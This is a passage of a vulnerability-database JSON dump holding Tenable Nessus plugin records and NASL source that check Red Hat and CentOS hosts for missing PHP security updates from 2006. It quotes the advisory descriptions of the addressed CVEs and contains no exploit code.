["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482"], "modified": "2018-11-16T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-pear", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-domxml", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "id": "REDHAT-RHSA-2006-0669.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22443", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0669. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22443);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/11/16 15:19:25\");\n\n script_cve_id(\"CVE-2006-3016\", \"CVE-2006-4020\", \"CVE-2006-4482\", \"CVE-2006-4484\", \"CVE-2006-4486\");\n script_xref(name:\"RHSA\", value:\"2006:0669\");\n\n script_name(english:\"RHEL 3 / 4 : php (RHSA-2006:0669)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier\nto be used, a cross-site-scripting or response-splitting attack could\nbe possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a\nscript used the sscanf() function with positional arguments in the\nformat string, a remote attacker sending a carefully crafted request\ncould execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and\nstr_repeat() functions. If a script running on a 64-bit server used\neither of these functions on untrusted user data, a remote attacker\nsending a carefully crafted request might be able to cause a heap\noverflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script\nwas set up to process GIF images from untrusted sources using the gd\nextension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation\nhandling. On 64-bit platforms, the 'memory_limit' setting was not\nenforced correctly, which could allow a denial of service attack by a\nremote user. (CVE-2006-4486)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues. These packages also\ncontain a fix for a bug where certain input strings to the metaphone()\nfunction could cause memory corruption.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4482\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4484\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0669\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0669\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"php-4.3.2-36.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-devel-4.3.2-36.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-imap-4.3.2-36.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-ldap-4.3.2-36.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-mysql-4.3.2-36.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-odbc-4.3.2-36.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-pgsql-4.3.2-36.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.18\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.18\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-11T13:08:35", "references": ["http://www.nessus.org/u?c4af8cff", "http://www.nessus.org/u?16073a4e", "http://www.nessus.org/u?3c131124", "http://www.nessus.org/u?175e5c9b", "http://www.nessus.org/u?e97c6b1e", "http://www.nessus.org/u?98c2bc17"], "pluginID": "22423", "description": "Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script was set up to process GIF images from untrusted sources using the gd extension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption.", "edition": 7, "reporter": "Tenable", "published": "2006-09-22T00:00:00", "title": "CentOS 3 / 4 : php (CESA-2006:0669)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4486", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:php-mbstring", "p-cpe:/a:centos:centos:php-pgsql", "p-cpe:/a:centos:centos:php", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:php-ldap", "p-cpe:/a:centos:centos:php-snmp", "p-cpe:/a:centos:centos:php-gd", "p-cpe:/a:centos:centos:php-mysql", "p-cpe:/a:centos:centos:php-devel", "p-cpe:/a:centos:centos:php-odbc", "p-cpe:/a:centos:centos:php-imap", "p-cpe:/a:centos:centos:php-pear", "p-cpe:/a:centos:centos:php-domxml", "p-cpe:/a:centos:centos:php-xmlrpc", "p-cpe:/a:centos:centos:php-ncurses", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2006-0669.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22423", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0669 and \n# CentOS Errata and Security Advisory 2006:0669 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22423);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/10 11:49:27\");\n\n script_cve_id(\"CVE-2006-3016\", \"CVE-2006-4020\", \"CVE-2006-4482\", \"CVE-2006-4484\", \"CVE-2006-4486\");\n script_xref(name:\"RHSA\", value:\"2006:0669\");\n\n script_name(english:\"CentOS 3 / 4 : php (CESA-2006:0669)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier\nto be used, a cross-site-scripting or response-splitting attack could\nbe possible. (CVE-2006-3016)\n\nA buffer overflow was discovered in the PHP sscanf() function. If a\nscript used the sscanf() function with positional arguments in the\nformat string, a remote attacker sending a carefully crafted request\ncould execute arbitrary code as the 'apache' user. (CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and\nstr_repeat() functions. If a script running on a 64-bit server used\neither of these functions on untrusted user data, a remote attacker\nsending a carefully crafted request might be able to cause a heap\noverflow. (CVE-2006-4482)\n\nA buffer overflow was discovered in the PHP gd extension. If a script\nwas set up to process GIF images from untrusted sources using the gd\nextension, a remote attacker could cause a heap overflow.\n(CVE-2006-4484)\n\nAn integer overflow was discovered in the PHP memory allocation\nhandling. On 64-bit platforms, the 'memory_limit' setting was not\nenforced correctly, which could allow a denial of service attack by a\nremote user. (CVE-2006-4486)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues. These packages also\ncontain a fix for a bug where certain input strings to the metaphone()\nfunction could cause memory corruption.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013277.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16073a4e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013278.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c4af8cff\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013279.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?175e5c9b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013280.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e97c6b1e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013281.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3c131124\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013282.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?98c2bc17\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-4.3.2-36.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-devel-4.3.2-36.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-imap-4.3.2-36.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-ldap-4.3.2-36.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-mysql-4.3.2-36.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-odbc-4.3.2-36.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-pgsql-4.3.2-36.ent\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"php-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-devel-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-domxml-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-gd-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-imap-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ldap-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mbstring-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mysql-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ncurses-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-odbc-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pear-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pgsql-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-snmp-4.3.9-3.18\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-xmlrpc-4.3.9-3.18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-17T07:05:25", "references": ["https://access.redhat.com/security/cve/cve-2006-4486", "https://access.redhat.com/security/cve/cve-2006-3016", "https://access.redhat.com/security/cve/cve-2006-4482", "https://access.redhat.com/security/cve/cve-2006-4020", "https://access.redhat.com/errata/RHSA-2006:0682"], "pluginID": "22444", "description": "Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier to be used, a cross-site-scripting or response-splitting attack could be possible. (CVE-2006-3016)\n\nA buffer overflow was discovered found in the PHP sscanf() function.\nIf a script used the sscanf() function with positional arguments in the format string, a remote attacker sending a carefully crafted request could execute arbitrary code as the 'apache' user.\n(CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and str_repeat() functions. If a script running on a 64-bit server used either of these functions on untrusted user data, a remote attacker sending a carefully crafted request might be able to cause a heap overflow. (CVE-2006-4482)\n\nAn integer overflow was discovered in the PHP memory allocation handling. On 64-bit platforms, the 'memory_limit' setting was not enforced correctly, which could allow a denial of service attack by a remote user. (CVE-2006-4486)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues. These packages also contain a fix for a bug where certain input strings to the metaphone() function could cause memory corruption.", "edition": 8, "reporter": "Tenable", "published": "2006-09-22T00:00:00", "title": "RHEL 2.1 : php (RHSA-2006:0682)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4486", "CVE-2006-4020", "CVE-2006-3016", "CVE-2006-4482"], "modified": "2018-11-16T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-manual"], "id": "REDHAT-RHSA-2006-0682.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22444", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0682. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22444);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/11/16 15:19:25\");\n\n script_cve_id(\"CVE-2006-3016\", \"CVE-2006-4020\", \"CVE-2006-4482\", \"CVE-2006-4486\");\n script_xref(name:\"RHSA\", value:\"2006:0682\");\n\n script_name(english:\"RHEL 2.1 : php (RHSA-2006:0682)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA response-splitting issue was discovered in the PHP session handling.\nIf a remote attacker can force a carefully crafted session identifier\nto be used, a cross-site-scripting or response-splitting attack could\nbe possible. (CVE-2006-3016)\n\nA buffer overflow was discovered found in the PHP sscanf() function.\nIf a script used the sscanf() function with positional arguments in\nthe format string, a remote attacker sending a carefully crafted\nrequest could execute arbitrary code as the 'apache' user.\n(CVE-2006-4020)\n\nAn integer overflow was discovered in the PHP wordwrap() and\nstr_repeat() functions. If a script running on a 64-bit server used\neither of these functions on untrusted user data, a remote attacker\nsending a carefully crafted request might be able to cause a heap\noverflow. (CVE-2006-4482)\n\nAn integer overflow was discovered in the PHP memory allocation\nhandling. On 64-bit platforms, the 'memory_limit' setting was not\nenforced correctly, which could allow a denial of service attack by a\nremote user. (CVE-2006-4486)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues. These packages also\ncontain a fix for a bug where certain input strings to the metaphone()\nfunction could cause memory corruption.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4482\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0682\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release 